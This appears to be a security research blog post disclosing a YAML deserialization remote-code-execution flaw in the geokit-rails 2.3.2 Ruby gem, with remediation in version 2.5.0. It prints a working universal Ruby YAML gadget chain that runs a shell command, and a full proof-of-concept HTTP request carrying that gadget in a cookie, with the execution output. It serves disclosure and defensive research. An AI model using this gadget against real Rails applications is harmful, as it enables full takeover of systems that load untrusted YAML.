Finding YAML Deserialization with Snyk Code
Calum Hutton
February 23, 2023
0 mins readI conducted some research to try and identify YAML Injection issues in open-source projects using Snyk Code. Though the vulnerability itself is not a new one, the potential impact of YAML Injection is high, which made it a good candidate for research. This research led to the discovery of several issues in open-source projects written in Python, PHP and Ruby. This article focuses on the issue found in geokit-rails version 2.3.2, a plugin for Ruby on Rails
YAML
YAML is more than a mere data interchange format such as JSON, the specification describes a number of advanced features that make it ripe for security investigation such as:
Custom tags (i.e. PyYAML)
Anchors and aliases
Merged attributes
Multiple-document streams
YAML can also be used to serialize binary data and arbitrary objects in various languages, potentially leading to deserialization vulnerabilities. These vulnerabilities are the target of this research, since successful exploitation often leads to Remote Code Execution (RCE).
YAML deserialization in Ruby
In Ruby, YAML parsing is built into the core language, so no additional libraries are needed. If an application uses the builtin Ruby YAML parser, it is vulnerable to deserialization attacks if YAML.load()
or YAML.load_file()
is used instead of YAML.safe_load() or YAML.safe_load_file(), respectively. An alternative, safe-by-default YAML parser is available in the SafeYAML project.
The following script and output demonstrate an unsafe way to load YAML with YAML.load()
.
1require 'yaml'
2
3var = {
4 id: 1,
5 desc: 'A simple hash'
6}
7
8yaml = '---
9:id: 1
10:desc: A simple hash'
11
12puts var
13puts YAML.load(yaml)
14
15# Prints:
16
17{:id=>1, :desc=>"A simple hash"}
18{:id=>1, :desc=>"A simple hash"}
The var
variable holds a simple Ruby hash, with the yaml
variable containing the equivalent hash, serialized in YAML form. Both puts
statements display the same hash, because the yaml
variable has been deserialized back from a YAML string into a hash via YAML.load()
. More complex objects can also be serialized and deserialized in this way.
During the initial stages of this research, I came across a Universal Ruby YAML deserialization gadget that was effective on Ruby versions 2.x to 3.x. which, when deserialized, would trigger arbitrary command execution.
1---
2- !ruby/object:Gem::Installer
3 i: x
4- !ruby/object:Gem::SpecFetcher
5 i: y
6- !ruby/object:Gem::Requirement
7 requirements:
8 !ruby/object:Gem::Package::TarReader
9 io: &1 !ruby/object:Net::BufferedIO
10 io: &1 !ruby/object:Gem::Package::TarReader::Entry
11 read: 0
12 header: "abc"
13 debug_output: &1 !ruby/object:Net::WriteAdapter
14 socket: &1 !ruby/object:Gem::RequestSet
15 sets: !ruby/object:Net::WriteAdapter
16 socket: !ruby/module 'Kernel'
17 method_id: :system
18 git_set: id
19 method_id: :resolve
The above YAML payload will execute the id
command upon deserialization if it is parsed via YAML.load()
or YAML.load_file()
.
Case study: geokit-rails (2.3.2)
The geokit-rails gem is a plugin for Ruby on Rails that provides location services for the application. The plugin uses the unsafe YAML.load()
method via the retrieve_location_from_cookie_or_service()
method in geokit-rails/ip_geocode_lookup.rb
:
1# Uses the stored location value from the cookie if it exists. If
2# no cookie exists, calls out to the web service to get the location.
3def retrieve_location_from_cookie_or_service
4 return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
5 location = Geocoders::MultiGeocoder.geocode(get_ip_address)
6 return location.success ? location : nil
7end
The data flowing into the unsafe YAML.load()
method originates from the Ruby on Rails cookies
parameter, which holds the cookies sent in the request. This is good news for an attacker as the cookies can be directly controlled by crafting the appropriate HTTP request.
Proof of concept
I set up a Rails application running the geokit-rails
plugin (version 2.3.2) on Ruby 3.0.0. The following HTTP request was sent to the application to exploit the issue. It includes the URL-encoded YAML payload in the geo_location
cookie.
1GET http://127.0.0.1:3000/vulns HTTP/1.1
2Host: 127.0.0.1:3000
3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5Accept-Language: en-GB,en;q=0.5
6Connection: keep-alive
7Upgrade-Insecure-Requests: 1
8Sec-Fetch-Dest: document
9Sec-Fetch-Mode: navigate
10Sec-Fetch-Site: none
11Sec-Fetch-User: ?1
12Content-Length: 0
13Cookie: geo_location=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2Fobject%3AGem%3A%3ARequirement%0A++requirements%3A%0A++++%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%0A++++io%3A+%261+%21ruby%2Fobject%3ANet%3A%3ABufferedIO%0A++++++io%3A+%261+%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%3A%3AEntry%0A+++++++++read%3A+0%0A+++++++++header%3A+%22abc%22%0A++++++debug_output%3A+%261+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++socket%3A+%261+%21ruby%2Fobject%3AGem%3A%3ARequestSet%0A+++++++++++++sets%3A+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++++++++++socket%3A+%21ruby%2Fmodule+%27Kernel%27%0A+++++++++++++++++method_id%3A+%3Asystem%0A+++++++++++++git_set%3A+id%0A+++++++++method_id%3A+%3Aresolve; _my_rails_app_session=%2B48ny21MkgVzlJR4LMcsdNtOK0G1aHx0%2Byoz4xLnkaMHrCner7YSRfQ04notQ0oNesQdG4EV5T%2FpyrQBSKBdKOZLLvP2J1NLOAQe1Z5zTTuu5Grcw1wuRpIHKAmZjfj3bqKqghkOj1JpOBxJoxFS7L6cH3wIsoq%2FrK%2BlAxVvP%2F8F9g5Q%2FA3pLVj2DTF3l7CcDBzOE9cPCOShesP717YbZNoa%2BPNf3mGjmKWvq26Y3CKMg2z7mAJHA%2B0CdA9l2pXsbrgwRJUW3Epqx4eJt0%2FDCJgS6Mp7rGjQeoIqLj4%3D--YAEA%2FepI0t701ifo--fVitYcX5PORz3a9xN4ev4A%3D%3D; __profilin=p%3Dt
Within the Rails application, the payload was deserialized and executed, running the id
command to prove command execution.
1Started GET "/vulns" for 127.0.0.1 at 2022-11-07 12:05:57 +0000 Processing by VulnsController#index as HTML
2sh: reading: command not found
3uid=501(calumh) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
4Completed 500 Internal Server Error in 167ms (Allocations: 35610)
For a system utilizing geokit-rails
, an attacker exploiting this vulnerability could initiate RCE, potentially allowing for total system takeover.
Remediation
This issue was responsibly disclosed to the maintainer of geokit-rails
and was fixed in version 2.5.0 of the software by replacing the YAML containing the coordinate information with JSON. From this research, Snyk Code’s rules to detect YAML injection were improved and enhanced, meaning even more of these issues should now be detectable in user projects.
Get started in capture the flag
Learn how to solve capture the flag challenges by watching our virtual 101 workshop on demand.